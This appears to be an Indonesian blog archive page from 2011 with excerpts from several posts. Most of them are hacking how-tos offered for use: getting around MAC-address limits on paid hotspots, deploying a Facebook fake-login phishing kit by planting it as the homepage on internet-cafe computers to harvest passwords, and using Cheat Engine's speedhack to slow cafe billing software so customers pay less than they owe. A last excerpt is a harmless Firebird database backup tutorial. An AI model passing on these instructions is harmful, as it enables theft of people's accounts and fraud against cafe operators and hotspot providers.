Skip to main content

Posts

Showing posts from January, 2011

Internet Gratis Dengan Cara Membobol Password Wifi Hotspot Warnet, Plasa, Cafe, Kampus ataw WArkop

Seperti kita ketahui, HotSPOT atau tempat akses internet Wireless dengan standard 802.11b/g sudah bukan barang asing lagi ditelinga kita, dan bila kita berpergian di tempat publik seperti Mall, Cafe, hotel dan kantor, dengan mudahnya kita menemukan fasilitas tersebut..

Namun sangat disayangkan tidak semua penyedia layanan menawarkan fasilitas Internet Wireless dengan gratis, atau kalaupun gratis,.sangatlah terbatas.
Salah satu proteksi yang digunakan penyedia layanan wireless adalah dengan membatasi akses internet berdasarkan MAC Address.
Apa itu MAC Adress ? In computer networking a Media Access Control address (MAC address) or Ethernet Hardware Address (EHA) or hardware address or adapter address is a quasi-unique identifier attached to most network adapters (NICs).. Oke jadi kesimpulannya MAC Address adalah nomer unik yang membedakan setiap perangkat jaringan yang terpasang dikomputer kita. Contoh kasus adalah HotSPOT di Food Court Plasa Semanggi. Pada HotSPOT FoodCourt Plasa Semanggi., …

hack facebook via fake login

kamu download dulu file nya dihttp://www.sendspace.com/folder/8psx85
nama filenya "facebook fake login.rar"

baca aturan pakai:

kmu hrus cari hostingn yang support ma php..
tinggal upload deh file write.php dan index.php nya..

klo berhasil..akan ada file baru ;Password.txt di direktory yang sama

selesai dah..untuk penyebaranya silahkan dengan cara masing2...

kalau gw sih caranya :
masuk ke warnetnya orang... teruz...
> untuk pengguna firefox: buka tools>option>main
(ubah homepage nya menjadi lokasi tempat lokasi file hosting untuk "fake login" kamu
> atau lo cari cara penyebaran web "fake login" lo dengan cara masing2


disini gw cm ngasih contoh satu untuk pengambilan secara paksa account2 facebook mania..memungkinkan hasil buruan kalian lebih bnyak nantinya...

memperlambat biling warnet, hahahahhah

stelah kemarin saya posting bobol biling warnet versi Lama, maka saya skarang akan posting yg lbih baru, penggunaan memperlambat bilng warnet ini make CE nah bagi yg belum punya CE ( Cheat Engine ) silahkan DL dari link dibawah ini, terserah mau versi yg berapa. tp kalo bisa yg 5.5 download di sini 1. Cari
Warnet Yang Cocok
2. Main 1 Jam
3. Install CE-Nya
4. Buka CE
5. Attach / Target ke Program Billingnya
6.
Pilih dan Set Speedhack 0.1. NB:
bwat no
6 kalo speedhacknya diatur berapa jadi berapa jam, tabelnya dibawah ini:
[spoiler].
TABEL SPEEDHACK.
0.1 = 1jam jadi 10 jam
0.2 = 1jam jadi 5 jam
0.3 = 1jam jadi 3.33jam
0.4 = 1jam jadi 2.5 jam
0.5 = 1jam jadi 2 jam
0.6 = 1jam jadi 1.66jam
0.7 = 1jam jadi 1.42jam
0.8 = 1jam jadi 1.25jam
0.9 = 1jam jadi 1.11jam
1.0 = 1jam jadi ya 1jam kalo sudah puas jadiin 7.0/brp yg gede supaya cepet selese
nah bayar kaya biasanya dah...
inget warnet orang jangan di bikin rugi.... saran:
mending make di warnet yang jumlah komput n pengunjungnya banyak, biar gag di curigain…..
hehehe . u …

backup dan restore data base firebird....

Dalam pembuatan aplikasi biasanya kita (terutama saya  ) selalu menyepelekan fitur yang satu ini, biasanya klo ditanya tentang fitur yang satu ini jawaban kita lebih kurang “udah copas aja databasenya trus dicompress, gampangkan”  . Tapi.. akhirnya saya kena batunya juga  , beberapa waktu lalu saya dapat klien yang ngotot banget untuk dibuatkan fitur ini dan untungnya firebird sudah menyediakan tool untuk menghandle masalah ini yaitu dengan menggunakan tool gbak. Pada artikel pertama ini kita akan bahas dulu penggunaan tool ini via command prompt, dan pada artikel berikutnya (insya Allah klo saya sempat  ) kita akan bahas penggunaannya langsung dari aplikasi. Oke langsung aja aktifkan command promptnya, kemudian masuk ke folder “C:\Program Files\Firebird\Firebird_2_1\bin” Untuk contoh disini kita akan membackup database yang ada di folder d:\database, adapun nama databasenya misal DBSIS.FDB. Di Firebird ekstensi hasil backup biasanya menggunakan “FBK” misal DBSIS.FBK 1. Backup Database Perin…